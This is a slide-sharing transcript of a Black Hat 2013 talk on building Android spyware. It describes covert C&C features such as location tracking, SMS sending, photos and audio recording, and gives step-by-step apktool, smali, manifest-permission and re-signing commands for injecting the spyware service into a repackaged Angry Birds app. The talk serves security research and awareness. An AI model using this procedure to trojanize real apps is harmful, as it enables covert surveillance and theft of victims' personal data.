agenda
play

Agenda Introduction Demo of SpyPhone in Action SpyPhone Design - PowerPoint PPT Presentation

Dec 22, 2022 •686 likes •992 views

How to Build a SpyPhone Black Hat 2013 Kevin McNamee Alcatel-Lucent Agenda Introduction Demo of SpyPhone in Action SpyPhone Design Injecting SpyPhone Service into an App Conclusion & Questions 2 SpyPhone - Then 3

  1. How to Build a SpyPhone Black Hat 2013 Kevin McNamee Alcatel-Lucent

  2. Agenda • Introduction • Demo of SpyPhone in Action • SpyPhone Design • Injecting SpyPhone Service into an App • Conclusion & Questions 2

  3. SpyPhone - Then 3

  4. SpyPhone - Now 4

  5. Surveillance – Then 5

  6. Surveillance - Now Internet 6

  7. Counter Measures – Then 7

  8. Counter Measures - Now Internet 8

  9. Smart Phone Has Access To… • GPS Location • Internet (from almost anywhere) • A Microphone • A Camera • Local Wifi Networks • E-Mail • Text Messages • Phone Calls • Contact List • Personal Information 9

  10. Smart Phone Is… • A perfect cyber- espionage tool that can be used to track the victim’s location, download personal information, intercept and send messages, record their conversations and take pictures without them knowing. • In the context of BYOD and APT, it makes a perfect platform for launching inside attacks on corporate or government networks. 10

  11. Demo Built an Android SpyPhone Service that can: • Steal phone and contact information • Report on location • Execute commands from C&C server − Display message on phone − Send SMS to contacts − Take pictures and sent to C&C − Record sound and sent to C&C SpyPhone Service is: • Injected into legitimate version of Angry Birds • Distributed from fake app store Demo Shows C&C Server • Installation of infected application • Sending information to C&C • Locating the device • Sending SMS C&C Protocol • Taking pictures • Recording sound 11

  21. SpyPhone Design • Implemented as Android Service – Self contained component – Runs in background even when app is stopped. – Starts at boot up – Easy to inject into legitimate applications • Command & Control – HTTP to NodeJS Web Server update: send information to server toast: display message on screen shutdown: stop the bot sms: send SMS message to contacts location: send location information to server peep: take picture and send to server listen: record sound and send to server 21

  23. Uses Standard Android APIs • • User Information Camera – – import android.accounts.Account; import android.hardware.Camera; – – import android.accounts.AccountManager; import android.hardware.Camera.PictureCallback; – • import android.hardware.Camera.PreviewCallback; Phone & SMS – import android.hardware.Camera.Size; – import android.telephony.SmsManager; – import android.media.AudioManager; – import android.telephony.TelephonyManager; – import android.view.SurfaceHolder; • Location – import android.view.SurfaceView; – import android.location.Location; • Web C&C – import android.location.LocationListener; – import org.apache.http.HttpResponse; – import android.location.LocationManager; – import org.apache.http.NameValuePair; • Recording – import org.apache.http.client.ClientProtocolException; – Import android.media.MediaRecording – import org.apache.http.client.HttpClient; 23

  24. Injection Process 1. Use apktool to extract the components from the target app (in this case Angry Birds 2000). apktool d AngryBirds.apk 24

  25. Injection Process 2. Copy the smali code for the service to be injected into the smali directory structure. In our case it was in the directory “example/android/ droidwhisper ”. 25

  26. Injection Process <?xml version="1.0" encoding="utf-8"?> <manifest android:versionCode="2000" android:versionName="2.0.0" android:installLocation="auto" package="com.rovio.angrybirds" 3. Update the manifest to include the xmlns:android="http://schemas.android.com/apk/res/android"> injected service and the permissions <application android:label="@string/app_name" android:icon="@drawable/icon" android:debuggable="false"> required by the injected service. The <activity android:theme="@android:style/Theme.NoTitleBar.Fullscreen" android:name="com.rovio.ka3d.App" android:launchMode="singleTask" android:screenOrientation="landscape" android:configChanges="keyboardHidden|orientation"> updated manifest in the case of Angry <intent-filter> <action android:name="android.intent.action.MAIN" /> Birds is shown below: <category android:name="android.intent.category.LAUNCHER" /> </intent-filter> – Remember the app name for later </activity> . . .(some lines missing). . . – Define the Droidwhisperer service <service android:name="com.example.android.droidwhisper.DictionarySvc"> <intent-filter> – Define required permissions <action android:name="com.rovio.ka3d.service.DICTIONARY_SERVICE" /> </intent-filter> </service> </application> <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" /> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" /> <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" /> <uses-permission android:name="android.permission.READ_PHONE_STATE “ /> <uses-permission android:name="android.permission.READ_CONTACTS “ /> <uses-permission android:name="android.permission.GET_ACCOUNTS “ /> <uses-permission android:name="android.permission.SEND_SMS “ /> <uses-permission android:name="android.permission.INTERNET “ /> <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION “ /> <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION “ /> <uses-permission android:name="android.permission.CAMERA"/> <uses-feature android:name="android.hardware.camera"/> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/> <uses-permission android:name="android.permission.RECORD_AUDIO"/> <uses-sdk android:minSdkVersion="4" android:targetSdkVersion="13" /> </manifest> 26

  27. Injection Process 4. Locate the onCreate function in the main activity of the target app. This can be found by looking in the manifest. In the case of Angry Birds this was “com/ rovio /ka3d/App”, highlighted in the manifest file above. Add the following smali code just after the “ involk- super” call to onCreate. new-instance v0, Landroid/content/Intent; invoke-direct {v0}, Landroid/content/Intent;-><init>()V .local v0, dictionaryIntent:Landroid/content/Intent; const-string v1, "com.rovio.ka3d.service.DICTIONARY_SERVICE" invoke-virtual {v0, v1}, Landroid/content/Intent;->setAction(Ljava/lang/String;)Landroid/content/Intent; invoke-virtual {p0, v0}, Landroid/app/Activity;->startService(Landroid/content/Intent;)Landroid/content/ComponentName; 27

  28. Injection Process 5. Rebuild the apk file using apktool. apktool b AngryBirds birds.apk 6. Sign the APK file. (Any old certificate will do!) jarsigner -verbose -keystore C:\kevin\keys birds.apk alias_name You can verify the cert with… jarsigner -verify -verbose -certs birds.apk 7. Optimize the APK file. zipalign -v 4 birds.apk birds1.apk 8. Install and test the new application. The logcat command can be used in the adb shell to check for errors. adb install birds1.apk 28

  29. SpyPhone Market 29

  30. Next... Questions? 30

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

R E B I R T H R E B I R T H 1 Meeting Agenda Meeting Agenda Agenda 1

R E B I R T H R E B I R T H 1 Meeting Agenda Meeting Agenda Agenda 1

Annual General Meeting of Shareholders No. 1/2015 28 January 2015 At 1.30 P.M. at Athenee Crystal Hall, 3rd Floor, Plaza Athenee Bangkok R E B I R T H R E B I R T H 1 Meeting Agenda Meeting Agenda Agenda 1 To certify

879 views • 54 slides
Negotiating Conflicts Eff Effectively ti l Agenda Agenda Agenda Agenda Introductions

Negotiating Conflicts Eff Effectively ti l Agenda Agenda Agenda Agenda Introductions

Negotiating Conflicts Eff Effectively ti l Agenda Agenda Agenda Agenda Introductions Introductions 1) Negotiation Characteristics 2) Approaches to Conflict 2) Approaches to Conflict 3) Issues, Positions, and Interests 4)

1.06k views • 60 slides
Web E Web E ngineer ngineer ing Pr ing Pr oc ess oc ess We e k 2 Agenda (Lecture) Agenda

Web E Web E ngineer ngineer ing Pr ing Pr oc ess oc ess We e k 2 Agenda (Lecture) Agenda

Web E Web E ngineer ngineer ing Pr ing Pr oc ess oc ess We e k 2 Agenda (Lecture) Agenda (Lecture) Web Engineering Process W b E i i P Agenda (Lab) Agenda (Lab) Web 2.0 architecture patterns Project proposal P j t l

1.06k views • 19 slides
Anaheim August 27, 2008 Agenda Agenda Agenda Introduction New Rule Requirements

Anaheim August 27, 2008 Agenda Agenda Agenda Introduction New Rule Requirements

Anaheim August 27, 2008 Agenda Agenda Agenda Introduction New Rule Requirements Compliance Plan Upgrade Issues Questions Introduction Introduction Introduction Danny Luong Senior Enforcement Manager Background

989 views • 29 slides
Capital markets day 27 th September 2017 Agenda Time Agenda item Led by Time Agenda item

Capital markets day 27 th September 2017 Agenda Time Agenda item Led by Time Agenda item

Capital markets day 27 th September 2017 Agenda Time Agenda item Led by Time Agenda item Led by 14:15 TEA &amp; COFFEE BREAK 11.00 Introduction Carolyn McCall 11.05 1. Market / Network 14.30 4. Making travel easy &amp; affordable

1.22k views • 90 slides
Community Advisory Group Meeting June 20, 2016 Agenda 1. Welcome, Introductions and Agenda

Community Advisory Group Meeting June 20, 2016 Agenda 1. Welcome, Introductions and Agenda

Community Advisory Group Meeting June 20, 2016 Agenda 1. Welcome, Introductions and Agenda Overview 2. Public Comment (items not on the agenda) 3. CAG Questions and Concerns (items not on the agenda) 4. Labor Issue Update 5. New Generation

1.22k views • 55 slides
Agenda TOSITA Agenda July 15, 2015 9:30 - 10:00: Registration 10:00 -10:10: Welcome- PECO

Agenda TOSITA Agenda July 15, 2015 9:30 - 10:00: Registration 10:00 -10:10: Welcome- PECO

Agenda TOSITA Agenda July 15, 2015 9:30 - 10:00: Registration 10:00 -10:10: Welcome- PECO Perspective Bill Patterer -PECO 10:10- 10:20: Workshop Agenda/ EP-ACT Intro/EV overview Tony Bandiero EP-ACT 10:20- 10:35: EVSEs - What are They?

291 views • 15 slides
Agenda Agenda Linda Rammler, UConn UCEDD (copy from Agenda handout) Fr. John Gallagher,

Agenda Agenda Linda Rammler, UConn UCEDD (copy from Agenda handout) Fr. John Gallagher,

2/21/18 Agenda Agenda Linda Rammler, UConn UCEDD (copy from Agenda handout) Fr. John Gallagher, O.F.M. Cap. (St. Pius X Church) Kim Ranell Newgass (Baptist Church in New Haven) Mary Lou Freitas (Bethany Covenant) Doris

508 views • 5 slides
Mississauga Halton LHIN CSS and MH&amp;A Sector Meeting June 11, 2010 Agenda Agenda Welcome

Mississauga Halton LHIN CSS and MH&amp;A Sector Meeting June 11, 2010 Agenda Agenda Welcome

Mississauga Halton LHIN CSS and MH&amp;A Sector Meeting June 11, 2010 Agenda Agenda Welcome and Agenda Community Care Information Management Program Herb Spence Stakeholder Engagement, HRIS (CCIM) Eugene Cortes - Project Lead,

2.11k views • 122 slides
Welcome June 2020 Agenda I. Welcome and Introductions II. Consent Agenda a. Approval of June

Welcome June 2020 Agenda I. Welcome and Introductions II. Consent Agenda a. Approval of June

Welcome June 2020 Agenda I. Welcome and Introductions II. Consent Agenda a. Approval of June Agenda b. Approval of February minutes c. Women in Jail Research Study III. Old Business a. JRAC Membership b. COVID-19 Strategies and Sustainability

539 views • 26 slides
Todays Agenda Todays Agenda Continued Todays Agenda Continued Save the Date August

Todays Agenda Todays Agenda Continued Todays Agenda Continued Save the Date August

Todays Agenda Todays Agenda Continued Todays Agenda Continued Save the Date August 17 &amp; 18, 2021 10th Annual Nation to Nation Consultation Host: Chickasaw Nation USDA Leadership &amp; Tribal Leaders Oklahoma NRCS

892 views • 65 slides
E-beam and X-ray: Why? What? How? 1 Introduction &amp; Agenda Agenda: We are investing to

E-beam and X-ray: Why? What? How? 1 Introduction &amp; Agenda Agenda: We are investing to

E-beam and X-ray: Why? What? How? 1 Introduction &amp; Agenda Agenda: We are investing to supply and service a growing market E-Beam and X-ray are complementary solution that are financially viable Mevex and IBA are there to help

198 views • 15 slides
Katie Dively, Research Scientist II Agenda Agenda Agenda Agenda Welcome! 7 Step

Katie Dively, Research Scientist II Agenda Agenda Agenda Agenda Welcome! 7 Step

Katie Dively, Research Scientist II Agenda Agenda Agenda Agenda Welcome! 7 Step Communication Process Your Role Next Steps Centers Purpose Centers Purpose Centers Purpose Centers Purpose We are an

744 views • 55 slides
IDN BOF Agenda Harald Alvestrand, chair Agenda - 1 0900: Agenda bash, blue sheet, scribe ! 0910:

IDN BOF Agenda Harald Alvestrand, chair Agenda - 1 0900: Agenda bash, blue sheet, scribe ! 0910:

IDN BOF Agenda Harald Alvestrand, chair Agenda - 1 0900: Agenda bash, blue sheet, scribe ! 0910: Introduction to the IDN revision - John Klensin - An orientation on the main goals of the revision - Explanation of the division of labor between

233 views • 10 slides
#EdSummit @MorenoValleyUSD @BarrCenter 1 Agenda 10:45 Agenda 10:45 - 11:30 am 11:30 am

#EdSummit @MorenoValleyUSD @BarrCenter 1 Agenda 10:45 Agenda 10:45 - 11:30 am 11:30 am

#EdSummit @MorenoValleyUSD @BarrCenter 1 Agenda 10:45 Agenda 10:45 - 11:30 am 11:30 am 10:45 - 10:50 am: Introductions 10:50 - 10:55 am: MVUSD Board President Susan Smith 10:55 - 11:00 am: MVUSD Superintendent Dr. Martinrex Kedziora

408 views • 21 slides
Agenda Item 4: PUBLIC COMMENT Individuals may speak on any topic for up to three minutes; during

Agenda Item 4: PUBLIC COMMENT Individuals may speak on any topic for up to three minutes; during

4/25/19 SA SAN F FRANCISQ SQUITO C CREEK S F C J PA . O R G J O I N T P O W E R S A U T H O R I T Y BOARD OF DIRECTORS MEETING Menlo Park City Council Chambers April 25, 2019 at 2:30 p.m. AGENDA 1. ROLL CALL 2. APPROVAL OF AGENDA 3.

158 views • 15 slides
Then some of the Pharisees and teachers of the law said to him, Teacher, we want to see a sign

Then some of the Pharisees and teachers of the law said to him, Teacher, we want to see a sign

Then some of the Pharisees and teachers of the law said to him, Teacher, we want to see a sign from you. 39 39 He answered, A wicked and adulterous generation asks for a sign! But none will be given it except the sign of the prophet

434 views • 21 slides
Main Main Mes Messag age Korach Highlights and Takeaways YHWH is the giver of Authority so

Main Main Mes Messag age Korach Highlights and Takeaways YHWH is the giver of Authority so

Main Main Mes Messag age Korach Highlights and Takeaways YHWH is the giver of Authority so rebellion against the Leaders He put in place is Rebellion against Him. (Num 16:3,9; Rom 13:1-2) Equal Worth is not the same as Equal Authority

450 views • 11 slides
JAMES 1:19 My dear brothers and sisters, take note of this: Everyone should be quick to listen,

JAMES 1:19 My dear brothers and sisters, take note of this: Everyone should be quick to listen,

JAMES 1:19 My dear brothers and sisters, take note of this: Everyone should be quick to listen, slow to speak and slow to become angry, JONAH 1:3 But Jonah ran away from the L ORD and headed for Tarshish. JONAH 1:12 Pick me up and throw

185 views • 14 slides
Ubiquitous and Mobile Computing CS 528: Falling asleep with Angry Birds, Facebook and Kindle: a

Ubiquitous and Mobile Computing CS 528: Falling asleep with Angry Birds, Facebook and Kindle: a

Ubiquitous and Mobile Computing CS 528: Falling asleep with Angry Birds, Facebook and Kindle: a large scale study on mobile application usage Di Yu Electrical and Computer Engineering Dept. Worcester Polytechnic Institute (WPI) What's the problem

333 views • 21 slides
Here are the songs we sang this Sunday. This shows the song name, the artist who performed the

Here are the songs we sang this Sunday. This shows the song name, the artist who performed the

Here are the songs we sang this Sunday. This shows the song name, the artist who performed the song, and the cd that contains the song. Same Power Jeremy Camp I Will Follow Youll Come Hillsong Live This is Our God Praise to the

720 views • 34 slides
SI486m? : NLP Set 6 Sentiment and Opinions It's about finding out what people think... Can be

SI486m? : NLP Set 6 Sentiment and Opinions It's about finding out what people think... Can be

SI486m? : NLP Set 6 Sentiment and Opinions It's about finding out what people think... Can be big business Someone who wants to buy a camera Looks for reviews online Someone who just bought a camera Writes reviews online

620 views • 39 slides
Be Angry ry and Do Not Sin The world is falling apart. Heres how we fix it. Therefore, la

Be Angry ry and Do Not Sin The world is falling apart. Heres how we fix it. Therefore, la

Be Angry ry and Do Not Sin The world is falling apart. Heres how we fix it. Therefore, la laying aside fals lsehood, SPEAK TRUTH EACH ONE of you WIT ITH HIS IS NEIGHBOR, for we are members of one another. BE ANGRY, AND yet DO NOT SIN

374 views • 8 slides
Networking in Unity Emil AngryAnt Johansen Unity Technologies Networking in Unity HTTP

Networking in Unity Emil AngryAnt Johansen Unity Technologies Networking in Unity HTTP

Networking in Unity Emil AngryAnt Johansen Unity Technologies Networking in Unity HTTP and browser interface End to end connections HTTP and browser interface HTTP WWW WWWForm Yield to pause coroutine WebPlayer WWW security

440 views • 15 slides

More recommend